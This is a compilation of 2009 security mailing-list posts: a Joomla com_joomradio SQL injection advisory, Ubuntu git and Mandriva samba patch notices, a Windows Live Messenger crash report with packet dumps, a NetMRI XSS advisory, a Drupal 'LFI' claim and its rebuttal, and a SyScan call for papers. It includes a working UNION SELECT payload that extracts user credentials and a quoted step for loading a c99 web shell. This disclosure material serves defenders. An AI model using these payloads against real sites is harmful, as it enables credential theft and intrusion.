Re: [Full-disclosure] Joomla Component com_joomradio SQL Injection
Already discovered in June, 2008. http://packetstormsecurity.org/0806-exploits/joomlajoomradio-sql.txt bc9c589fca40fce9a4f4484333f207b5 The Joomla Joomradio component version 1.0 suffers from a remote SQL injection vulnerability. Authored By mailto:His0k4.hlm[at]gmail.com";>His0k4 On Wed, Feb 18, 2009 at 07:32:02PM +0100, 0o_zeus_o0 wrote: > ### > # Advisory X > # Title: Joomla Component com_joomradio SQL Injection > # Author: 0o_zeus_o0 ( Arturo Z. ) > # Contact: arturo_zamor...@hotmail.com > # Website: www.securitybroken.com > # Date: 18/02/09 > # Risk: Medium > # Vendor Url: http://ajaxportal.eu/ > # Affected Software: JoomRadio > # autor script:author XrByte , Grusha > ## > # > #Example: > ## > #htp:// > victimurl.com/pathjoomla/index.php?option=com_joomradio&page=show_radio&id=-1UNION > SELECT > user(),concat(username,0x3a,password),user(),user(),user(),user(),user() > FROM jos_users-- > # > ## > #greetz: > # > # original advisorie: http://www.securitybroken.com > ## > ___ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/
[USN-723-1] Git vulnerabilities
=== Ubuntu Security Notice USN-723-1 February 18, 2009 git-core vulnerabilities CVE-2008-3546, CVE-2008-5516, CVE-2008-5517, CVE-2008-5916 === A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 7.10 Ubuntu 8.04 LTS Ubuntu 8.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: git-core1.1.3-1ubuntu1.1 Ubuntu 7.10: git-core1:1.5.2.5-2ubuntu0.1 gitweb 1:1.5.2.5-2ubuntu0.1 Ubuntu 8.04 LTS: git-core1:1.5.4.3-1ubuntu2.1 gitweb 1:1.5.4.3-1ubuntu2.1 Ubuntu 8.10: git-core1:1.5.6.3-1.1ubuntu2.1 gitweb 1:1.5.6.3-1.1ubuntu2.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that Git did not properly handle long file paths. If a user were tricked into performing commands on a specially crafted Git repository, an attacker could possibly execute arbitrary code with the privileges of the user invoking the program. (CVE-2008-3546) It was discovered that the Git web interface (gitweb) did not correctly handle shell metacharacters when processing certain commands. A remote attacker could send specially crafted commands to the Git server and execute arbitrary code with the privileges of the Git web server. This issue only applied to Ubuntu 7.10 and 8.04 LTS. (CVE-2008-5516, CVE-2008-5517) It was discovered that the Git web interface (gitweb) did not properly restrict the diff.external configuration parameter. A local attacker could exploit this issue and execute arbitrary code with the privileges of the Git web server. This issue only applied to Ubuntu 8.04 LTS and 8.10. (CVE-2008-5916) Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1.diff.gz Size/MD5: 8481 84fe19c380b31b7964b6c07a2500afee http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1.dsc Size/MD5: 726 b23292f80d33ee016fcf97a4255dac6d http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3.orig.tar.gz Size/MD5: 572735 4527e2a1afe3e30c0dc49455d9445dab Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-doc_1.1.3-1ubuntu1.1_all.deb Size/MD5: 274678 e523f354649e74138b2aec0842bda73e http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-email_1.1.3-1ubuntu1.1_all.deb Size/MD5:10040 099cc4c8d98d641cb8832e1b7d767db2 http://security.ubuntu.com/ubuntu/pool/main/g/git-core/gitk_1.1.3-1ubuntu1.1_all.deb Size/MD5:34830 9467ee72ac93ef0f3417e76b9f7955e1 http://security.ubuntu.com/ubuntu/pool/universe/g/git-core/git-arch_1.1.3-1ubuntu1.1_all.deb Size/MD5:18572 eacf41e5062a143d9d959c0e2a2d4846 http://security.ubuntu.com/ubuntu/pool/universe/g/git-core/git-cvs_1.1.3-1ubuntu1.1_all.deb Size/MD5:17804 8bcbc71667cd93ee00b9b3034c419c43 http://security.ubuntu.com/ubuntu/pool/universe/g/git-core/git-svn_1.1.3-1ubuntu1.1_all.deb Size/MD5:14464 c90c396cdebda9315ec6c567c29da498 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1_amd64.deb Size/MD5: 2175496 6d631f1b04de3816e1a2a2c2401dc527 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1_i386.deb Size/MD5: 1783188 3dab34c13e1ccbc7e3168e55043bc185 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1_powerpc.deb Size/MD5: 2160072 5d23dfdca43d79e68d3c85ca75c87e78 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.1.3-1ubuntu1.1_sparc.deb Size/MD5: 1819706 78da61a35bb9ad71a29c84e30bcc311f Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.5.2.5-2ubuntu0.1.diff.gz Size/MD5: 144952 d83b395b7bbd2cd749d9aa5d97a83bcd http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.5.2.5-2ubuntu0.1.dsc Size/MD5: 913 6da97e15925a75ff803168fea6b9b925 http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-core_1.5.2.5.orig.tar.gz Size/MD5: 1413507 4e8de9e56882f3214a92f6d7dc3c49ec Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/g/git-core/git-doc_1.5.2.5-2ubuntu0.1_all.deb Size/MD5:
[ MDVSA-2009:042 ] samba
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2009:042 http://www.mandriva.com/security/ ___ Package : samba Date: February 18, 2009 Affected: 2009.0 ___ Problem Description: Samba 3.2.0 through 3.2.6, when registry shares are enabled, allows remote authenticated users to access the root filesystem via a crafted connection request that specifies a blank share name (CVE-2009-0022). This update provides samba 3.2.7 to address this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0022 ___ Updated Packages: Mandriva Linux 2009.0: f9672d52051da5b814933c2f764cf665 2009.0/i586/libnetapi0-3.2.7-0.1mdv2009.0.i586.rpm 8395587171c03b986d6c6debe32d421d 2009.0/i586/libnetapi-devel-3.2.7-0.1mdv2009.0.i586.rpm 419e8930d9a83af98db87db40b532159 2009.0/i586/libsmbclient0-3.2.7-0.1mdv2009.0.i586.rpm 79a9ddeaad8356546d77f40e5f8823b6 2009.0/i586/libsmbclient0-devel-3.2.7-0.1mdv2009.0.i586.rpm 674ed223557b5c9bf137782cf7a24d89 2009.0/i586/libsmbclient0-static-devel-3.2.7-0.1mdv2009.0.i586.rpm fca38c8651f2dfc79314d4184f9bbfa0 2009.0/i586/libsmbsharemodes0-3.2.7-0.1mdv2009.0.i586.rpm a863211596f28dc756d79896f4e9e161 2009.0/i586/libsmbsharemodes-devel-3.2.7-0.1mdv2009.0.i586.rpm f307514ed1e44e777cc852f0314b6159 2009.0/i586/libtalloc1-3.2.7-0.1mdv2009.0.i586.rpm 642ff276c29471425bff0536aeb9bfdf 2009.0/i586/libtalloc-devel-3.2.7-0.1mdv2009.0.i586.rpm 915958f5aefa05cbcf7e9932351aaec5 2009.0/i586/libtdb1-3.2.7-0.1mdv2009.0.i586.rpm 5b0826d63a36305f2eb55cd73bce0fb0 2009.0/i586/libtdb-devel-3.2.7-0.1mdv2009.0.i586.rpm 630fdfaf7ed4bb735f904c655fd7229a 2009.0/i586/libwbclient0-3.2.7-0.1mdv2009.0.i586.rpm 625d0733d9862bee6491695001b3f495 2009.0/i586/libwbclient-devel-3.2.7-0.1mdv2009.0.i586.rpm 24b1dedd7adc4a4b8f41f4049c521190 2009.0/i586/mount-cifs-3.2.7-0.1mdv2009.0.i586.rpm 786b41af61e1231261d8a691e051e6e8 2009.0/i586/nss_wins-3.2.7-0.1mdv2009.0.i586.rpm 3e7c63f3a2252d8222054a77fe51eb0b 2009.0/i586/samba-client-3.2.7-0.1mdv2009.0.i586.rpm 0243aebbb4d47aa1fab3e8498f2bc0ed 2009.0/i586/samba-common-3.2.7-0.1mdv2009.0.i586.rpm 5fb67d67607d4e70c2395917f57143a7 2009.0/i586/samba-doc-3.2.7-0.1mdv2009.0.i586.rpm d7231c511a3a3e99d9c611a1942e112d 2009.0/i586/samba-server-3.2.7-0.1mdv2009.0.i586.rpm 196ed3589e5cbb63de16098ee947ce78 2009.0/i586/samba-swat-3.2.7-0.1mdv2009.0.i586.rpm bef4656a6f1d3e1e303a82ce5a5736e8 2009.0/i586/samba-winbind-3.2.7-0.1mdv2009.0.i586.rpm 20b63670ed98d96b046929b19d03b17a 2009.0/SRPMS/samba-3.2.7-0.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: 8543b1c900940717ce87593bcd894ddd 2009.0/x86_64/lib64netapi0-3.2.7-0.1mdv2009.0.x86_64.rpm f8a4585909a44f037d90f3f40f5408a7 2009.0/x86_64/lib64netapi-devel-3.2.7-0.1mdv2009.0.x86_64.rpm 5e8baaab26d9b709d4b04f7bde88e9a8 2009.0/x86_64/lib64smbclient0-3.2.7-0.1mdv2009.0.x86_64.rpm 797b7746caa92c8ea28a3e1fa218659a 2009.0/x86_64/lib64smbclient0-devel-3.2.7-0.1mdv2009.0.x86_64.rpm b1ec784b83915df65a7f1d6c06ce46c3 2009.0/x86_64/lib64smbclient0-static-devel-3.2.7-0.1mdv2009.0.x86_64.rpm b4cbff234e2ce3098b79887097ec1f98 2009.0/x86_64/lib64smbsharemodes0-3.2.7-0.1mdv2009.0.x86_64.rpm 26cd1508a8d960e01b1476d64e9a073c 2009.0/x86_64/lib64smbsharemodes-devel-3.2.7-0.1mdv2009.0.x86_64.rpm c4ce64515ad474fcfc4a33ba78e8bc25 2009.0/x86_64/lib64talloc1-3.2.7-0.1mdv2009.0.x86_64.rpm eff77f2eeff1b0f715da1cd6b9885122 2009.0/x86_64/lib64talloc-devel-3.2.7-0.1mdv2009.0.x86_64.rpm 85c16b38fa72a572ff1c09d1de454fb4 2009.0/x86_64/lib64tdb1-3.2.7-0.1mdv2009.0.x86_64.rpm 937d1d412b06fe68e8bd6175c5dbb967 2009.0/x86_64/lib64tdb-devel-3.2.7-0.1mdv2009.0.x86_64.rpm 85fd89501e053f3cd34ec78fbe140803 2009.0/x86_64/lib64wbclient0-3.2.7-0.1mdv2009.0.x86_64.rpm 9d2f55f2a15164e6188b967f99632572 2009.0/x86_64/lib64wbclient-devel-3.2.7-0.1mdv2009.0.x86_64.rpm f90927126796e521d371749467dc115d 2009.0/x86_64/mount-cifs-3.2.7-0.1mdv2009.0.x86_64.rpm e51ea5546011dee07fc7f1d1dbbdf04f 2009.0/x86_64/nss_wins-3.2.7-0.1mdv2009.0.x86_64.rpm 40f9be5aafb9a4e7562479fc54414825 2009.0/x86_64/samba-client-3.2.7-0.1mdv2009.0.x86_64.rpm 22a9db213304d56ba1837a9686694478 2009.0/x86_64/samba-common-3.2.7-0.1mdv2009.0.x86_64.rpm d24f54f23ddf196170c2fe8e149e853f 2009.0/x86_64/samba-doc-3.2.7-0.1mdv2009.0.x86_64.rpm b3e8420a896d9defaebc749abceb5eb2 2009.0/x86_64/samba-server-3.2.7-0.1mdv2009.0.x86_64.rpm 138562ffad186da5c639241c4d7971e5 2009.0/x86_64/samba-swat-3.2.7-0.1mdv2009.0.x86_64.rpm cff49e288971a75d4e2b5c812ed36a53 2009.0/x86_64/samba-winbind-3.2.7-
RE: hello bug in windows live messenger
Author :Microsoft Affected Software : Windows Live Messenger Version 2009 (build 14.0.8064.XXX) Discovered by : Mr Ha1 : Morad Quraan Date : 16/2/2009 Greats to : Toto , Xprincezuman , Ahmad Mars , Aousq , Navelove ;) MSN : webmas...@arabicsecurity.com --- - - --- --- -- -- i found Remote Denial of Service Lead WLM to Crash when you Change the Chartset of Msg you send to something not found {this packets sent form your pc when u try to send instant msg via msn} Example : 1 192.168.1.100:2038 64.4.34.31:1863 11 Send 58 46 52 20 32 32 20 53 42 0D 0A XFR 22 SB.. 2 192.168.1.100:2229 64.4.37.43:1863 104 Send 55 53 52 20 37 39 20 77 65 62 6D 61 73 74 65 72USR 79 webmaster 0010 40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E@arabicsecurity. 0020 63 6F 6D 3B 7B 32 35 32 42 46 30 36 38 2D 38 45com;{252BF068-8E 0030 46 35 2D 34 30 33 31 2D 38 36 35 42 2D 36 45 34F5-4031-865B-6E4 0040 44 31 42 35 37 38 43 39 41 7D 20 34 36 32 33 33D1B578C9A} 46233 0050 39 35 33 38 2E 32 31 30 32 31 35 33 39 2E 32 349538.21021539.24 0060 32 31 38 33 36 37 0D 0A218367.. 3 192.168.1.100:2229 64.4.37.43:1863 37 Send 43 41 4C 20 37 36 20 77 65 62 6D 61 73 74 65 72CAL 76 webmaster 0010 40 61 72 61 62 69 63 73 65 63 75 72 69 74 79 2E@arabicsecurity. 0020 63 6F 6D 0D 0A com.. 4 192.168.1.100:2229 64.4.37.43:1863 33 Send 43 41 4C 20 37 37 20 68 61 63 6B 5F 61 6E 79 5FCAL 77 hack_any_ 0010 6F 6E 65 40 68 6F 74 6D 61 69 6C 2E 63 6F 6D 0Do...@hotmail.com. 0020 0A . 5 192.168.1.100:2229 64.4.37.43:1863 146 Send 4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49MSG 78 N 132..MI 0010 4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0DME-Version: 1.0. 0020 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74.Content-Type: t 0030 65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73ext/plain; chars 0040 65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2Det=UTF-8..X-MMS- 0050 49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72IM-Format: FN=Ar 0060 61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65abic%20Transpare 0070 6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3Bnt; EF=B; CO=ff; 0080 20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A CS=b2; PF=2 0090 68 69 hi if we changed the last packet number 5 to : 5 192.168.1.100:2229 64.4.37.43:1863 146 Send 4D 53 47 20 37 38 20 4E 20 31 33 32 0D 0A 4D 49MSG 78 N 132..MI 0010 4D 45 2D 56 65 72 73 69 6F 6E 3A 20 31 2E 30 0DME-Version: 1.0. 0020 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 74.Content-Type: t 0030 65 78 74 2F 70 6C 61 69 6E 3B 20 63 68 61 72 73ext/plain; chars 0040 65 74 3D 55 54 46 2D 38 0D 0A 58 2D 4D 4D 53 2Det=UTF-8.0.X-MMS- 0050 49 4D 2D 46 6F 72 6D 61 74 3A 20 46 4E 3D 41 72IM-Format: FN=Ar 0060 61 62 69 63 25 32 30 54 72 61 6E 73 70 61 72 65abic%20Transpare 0070 6E 74 3B 20 45 46 3D 42 3B 20 43 4F 3D 66 66 3Bnt; EF=B; CO=ff; 0080 20 43 53 3D 62 32 3B 20 50 46 3D 32 0D 0A 0D 0A CS=b2; PF=2 0090 68 69 hi and resend the instant msg again to the target WLM will crash with this error : AppName: msnmsgr.exe AppVer: 14.0.8064.206 ModName: msvcr80.dll ModVer: 8.0.50727.1433 Offset: faa3 poc code made and its not open source coz its patched version of messenger if u want it tell me how to give it to u
DDIVRT-2009-20 NetMRI Login Application Cross-site Scripting Vulnerability
Title - DDIVRT-2009-20 NetMRI Login Application Cross-site Scripting Vulnerability Severity Low Date Discovered --- January 19th 2009 Discovered By - Digital Defense, Inc. Vulnerability Research Team Credit: David Marshall and r...@b13$ Vulnerability Description - NetMRI contains a cross-site scripting (XSS) issue whereby portions of the GET request are echoed back in an error page. This allows scripting tags to be executed by the browser to perform XSS attacks. Such an attack would require convincing a user to click on a specially crafted link. Solution Description On February 18, 2009, Netcordia released a patch named "CrossScriptPatch.gpg" to address this vulnerability in all currently supported versions of NetMRI through v3.0.1. Customers can acquire the patch through the normal mechanisms or contact Netcordia Technical Support (supp...@netcordia.com) for assistance. Additionally, the necessary changes will be incorporated in future versions beginning with NetMRI v3.0.2. Tested Systems / Software (with versions) -- Red Hat Linux, NetMRI Vendor Contact -- Name: Netcordia Website: http://www.netcordia.com/products/netmri-event-analysis.asp Contact Information: http://www.netcordia.com/contact/index.asp
Re: LFI in Drupal CMS
Rasool Nasr replied privately with additional details: - quote "You must go to the profile folder and create a file with .profile extension.Then you must copy your shell(such as c99) into created file for example create shell .profile and then use it with this sample: http://[sitename]/drupal/install.php?profile=shell"; - unquote Response: Installation profiles define which modules should be enabled, and can customize the installation after they have been installed. This allows customized "distributions" that enable and configure a set of modules that work together for a specific kind of site (Drupal for bloggers, Drupal for musicians, Drupal for developers, and so on). Just like other Drupal directories, the profiles directory is normally not writable by the webserver. The reported "vulnerability" is therefore in the same league as "ZOMG - IF YOU OVERWRITE INDEX.PHP, TEH CODE IS EXECUTED"" Regards Heine Deelstra -- Drupal security team
Re: SyScan'09 Call For Paper - Shanghai, Hong Kong, Singapore, Taipei
dear all CFP for SyScan'09 Shanghai and Hong Kong will be closing in 10 days' time. the closing date is 28th February 2009. If you do not want to miss out on a sensational party on a chinese junk sailing around Hong Kong's many islands and/or visiting the famous Shanghai Bund and tasting the most delicious "little dragon dumplings", send in your submission now. SyScan'09 CALL FOR PAPERS/TRAINING ABOUT SYSCAN'09 This year, SyScan'09 will be held in the 4 exciting cities of Singapore, Shanghai, Taipei and Hong Kong. Details are as follows: SyScan'09 Shanghai date: 13, 14 May 2009 venue: Ramada Plaza Hotel Shanghai SyScan'09 Hong Kong date: 19, 20 May 2009 venue: Langham Place Hotel SyScan'09 Singapore date: 2, 3 July 2009 venue: Novotel Clarke Quay Hotel SyScan'09 Taipei date: 7, 8 July 2009 venue: NTUH International Convention Center CFP COMMITTEE The Call for Papers committee for SyScan’09 comprises of the following personnel: 1. Thomas Lim – Organiser of SyScan and CEO of COSEINC 2. Dave Aitel – Founder and CTO of Immunitysec 3. Marc Maiffret – Ex-Founder and Chief Hacking Officer of eEye 4. Matthew “Shok” Conover – Symantec The CFP committee will review all submissions and determine the final list of speakers for SyScan’09. CONFERENCE TOPICS The focus for SyScan’09 will include the following: *Operating Systems * • Vista • Windows 7 • Linux *Mobile Devices/Embedded systems * • SmartPhones • PDAs • Game Consoles *Web 2.0 * • Web services • PHP • .Net/.asp • Web applications *Networking/Telecommunication * • VoIP • 3G/3.5G network • IPv6 • WLAN/WiFi • GPRS *New Technologies* • Chrome • IE8 • Android • iPhone *Virtualization * *Malware/Rootkits BotNets Security Policy/Best Practices Legislation* Any topics that will catch the attention of the CFP committee and/or the world. TRAINING TOPICS SyScan’09 training topics will focus on the following areas: Web Applications Networks Securing Windows/Linux Systems Databases Storage Secure Programming/Development PRIVILEGES Speakers’ Privileges: • Return economy class air-ticket for one person. • 3 nights of accommodation. • Breakfast, lunch and dinner during conference. • After-conference party. • A very healthy dose of alcohol and fun. • S$500 cash for speakers with brand new presentations. Trainers’ Privileges: • 50% of net profit of class. • 2 nights of accommodation (conference) (applicable for Singapore only). • After-conference party. • A very healthy dose of alcohol and fun. Please note that the net profit for each class is determined by the difference between the total fee collected for each class and the total expenses incurred for each class. The expenses of each class would include the return economy air-ticket of the trainer, 3 nights of accommodation (training) and the rental of the training venue. *CFP SUBMISSION* CFP submission must include the following information: 1) Brief biography including list of publications and papers published previously or training classes conducted previously. 2) Proposed presentation/training title, category, synopsis and description. 3) Contact Information (full name, alias, handler, e-mail, postal address, phone, fax, photo, country of origin, special dietary requirement). 4) Employment and/or affiliations information. 5) Any significant presentation and educational/training experience/background. 6) Why is your material different or innovative or significant or an important tutorial? Please note that all speakers will be allocated 50 minutes of presentation time. Any speakers that require more time must inform the CFP committee during the CFP submission. Training classes will be 2 full days. Please inform the CFP committee if your class is shorter or longer than 2 days during your CFP submission. All submissions must be in English and in PDF format only. The more information you provide, the better the chance for selection. Please send submission to c...@syscan.org. *IMPORTANT DATES * *Shanghai* Final CFP Submission – 28th February 2009. Notification of Acceptance – 16th March 2009. Final Submission for Accepted Presentation Material (Speakers) – 15th April 2009 *Hong Kong* Final CFP Submission – 28th February 2009. Notification of Acceptance – 16th March 2009. Final Submission for Accepted Presentation Material (Speakers) – 15th April 2009. *Singapore* Final CFP Submission – 31st March 2009. Notification of Acceptance – 15th April 2009. Final Submission for Accepted Presentation Material (Speakers) – 8th May 2009. *Taipei* Final CFP Submission – 31st March 2009. Notification of Acceptance – 15th April 2009. Final Submission for Accepted Presentation Material (Speakers) – 8th May 2009. *OTHER INFORMATION * Please feel free to visit SyScan website to get a feel what this conference is all about – SHARE AND HAVE FUN! By agreeing to speak at the SyScan'09 you are granting Syscan Pte. Ltd. the rights to reproduce, distribute, advertise and show your presentation including but not limited to